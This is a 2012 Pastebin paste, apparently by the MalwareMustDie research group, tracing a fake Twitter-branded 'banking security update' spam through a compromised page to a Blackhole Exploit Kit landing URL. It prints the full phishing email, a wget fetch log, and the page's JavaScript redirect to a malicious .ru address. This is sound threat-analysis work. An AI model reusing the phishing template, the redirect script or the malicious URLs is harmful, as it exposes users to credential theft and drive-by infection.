SHARE
TWEET

#MalwareMustDie - Spam to BHEK to xxxx

MalwareMustDie Dec 26th, 2012 124 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =====================================
  2. #MalwareMustDie - A quest
  3. Spam to BHEK to ...
  4.  
  5. =====================================
  6.  
  7. // Folowing "Twitter-Security-looks" Spams:
  8. // hint & follow by Ken Pryor
  9.  
  10. // Spam in orig format(txt)
  11.  
  12. Delivered-To: xxxxx@xxxxx.com
  13. Received: by 10.216.95.198 with SMTP id p48csp285246wef;
  14.         Wed, 26 Dec 2012 06:58:12 -0800 (PST)
  15. X-Received: by 10.182.36.8 with SMTP id m8mr22507914obj.93.1356533891842;
  16.         Wed, 26 Dec 2012 06:58:11 -0800 (PST)
  17. Return-Path: <JuniorGastelum@schmitt-title.com>
  18. Received: from ????-?? ([92.46.240.84])
  19.         by mx.google.com with ESMTP id y4si7207599obv.81.2012.12.26.06.58.08;
  20.         Wed, 26 Dec 2012 06:58:11 -0800 (PST)
  21. Received-SPF: softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) client-ip=92.46.240.84;
  22. Authentication-Results: mx.google.com; spf=softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) smtp.mail=JuniorGastelum@schmitt-title.com
  23. Received: from ham-cannon.twitter.com ([199.59.148.236]) by schmitt-title.com;
  24.          Wed, 26 Dec 2012 03:58:10 +0600
  25. Date: Wed, 26 Dec 2012 03:58:10 +0600
  26. From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
  27. Reply-To: noreply@postmaster.twitter.com
  28. To: xxxxx@xxxxx.com
  29. Message-Id: <1KC8PY8L49UMD_TPA1QU8PAABSYQ9C03@522357004.twitter.com.tmail>
  30. Subject: Re: Banking security update.
  31. Mime-Version: 1.0
  32. Content-Type: multipart/alternative; boundary=mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
  33. X-Campaignid: twitter51056991109478
  34. X-Twitterimpressionid: am-57174748899437484147607592
  35. Errors-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
  36. Bounces-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
  37. Return-Path: c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com
  38. X-OriginalArrivalTime: Wed, 26 Dec 2012 03:58:10 +0600 FILETIME=[726C4133:38072607]
  39.  
  40. --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
  41. Content-Type: text/plain; charset=UTF-8
  42. Content-Transfer-Encoding: 7bit
  43.  
  44. Dear Online Account Operator,
  45.  
  46. Your ACH  transactions have been
  47. temporarily disabled.
  48.  View details
  49.  
  50. Best regards,
  51. Security department
  52.  
  53.  
  54. --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
  55. Content-Type: text/html; charset=UTF-8
  56. Content-Transfer-Encoding: 7bit
  57.  
  58.  
  59. <html>
  60.   <body >
  61. Dear Online Account Operator, <br><br>
  62. Your ACH  transactions have been <br>
  63. temporarily disabled. <br>
  64.  <a href="http://www.bibliotekarz.pl/sites/all/themes/mail2.htm">View details </a><br><br>
  65.  
  66. Best regards,<br>
  67. Security department<br><br><br><br><br>
  68.  
  69. </body>
  70. </html>
  71. --mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51--
  72.  
  73.  
  74. // fetch the stuff..tips: use the email domain source as referer
  75.  
  76. --2012-12-27 02:24:45--  http://www.bibliotekarz.pl/sites/all/themes/mail2.htm
  77. Resolving www.bibliotekarz.pl (www.bibliotekarz.pl)... 194.181.21.145
  78. Caching www.bibliotekarz.pl => 194.181.21.145
  79. Connecting to www.bibliotekarz.pl (www.bibliotekarz.pl)|194.181.21.145|:80... connected.
  80. Created socket 3.
  81. Releasing 0x28804160 (new refcount 1).
  82.  
  83. ---request begin---
  84. GET /sites/all/themes/mail2.htm HTTP/1.1
  85. Referer: http://twitter.com
  86. User-Agent: MalwareMustDie is painting red X-mark on your door!
  87. Accept: */*
  88. Host: www.bibliotekarz.pl
  89. Connection: Keep-Alive
  90.  
  91. ---request end---
  92. HTTP request sent, awaiting response...
  93. ---response begin---
  94. HTTP/1.1 200 OK
  95. Date: Wed, 26 Dec 2012 16:16:06 GMT
  96. Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 PHP/5.2.14
  97. Last-Modified: Wed, 26 Dec 2012 16:07:02 GMT
  98. ETag: "250ef8-1a7-4d1c39eecf580"
  99. Accept-Ranges: bytes
  100. Content-Length: 423
  101. Cache-Control: max-age=1209600
  102. Expires: Wed, 09 Jan 2013 16:16:06 GMT
  103. Keep-Alive: timeout=5, max=100
  104. Connection: Keep-Alive
  105. Content-Type: text/html
  106.  
  107. ---response end---
  108. 200 OK
  109. Saving to: `mail2.htm'
  110. 2012-12-27 02:24:47 (8.08 MB/s) - `mail2.htm' saved [423/423]
  111.  
  112.  
  113. // See the inside....
  114.  
  115. @unixfreaxjp /malware]$ cat mail2.htm
  116. <html>
  117.  <head>
  118.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  119. <title>Please wait</title>
  120.  </head>
  121.  <body>
  122. <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
  123. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  124.  
  125. <script>
  126. var1=49;
  127. var2=var1;
  128. if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
  129. </script>
  130.  
  131. </body>
  132.  
  133.  
  134. // LANDING PAGE:
  135.  
  136.  http://bunakaranka.ru:8080/forum/links/column.php
  137.  
  138. // Blackhole PoC:
  139.  
  140. Resolving bunakaranka.ru (bunakaranka.ru)... 210.71.250.131, 187.85.160.106, 91.224.135.20
  141. Caching bunakaranka.ru => 210.71.250.131 187.85.160.106 91.224.135.20
  142. Connecting to bunakaranka.ru (bunakaranka.ru)|210.71.250.131|:8080... connected.
  143.  
  144. // THis pattern/signatures;:
  145. Server: nginx/1.0.10
  146. Date: Wed, 26 Dec 2012 17:30:46 GMT
  147. Content-Type: text/html; charset=CP-1251
  148. Connection: keep-alive
  149. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  150.  
  151.  
  152. // You know the drill from here, just follow guidance posts in malwaremustdie.blogspot.com !
  153.  
  154. ---
  155. MalwareMustDie - Dec 26th 2012
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top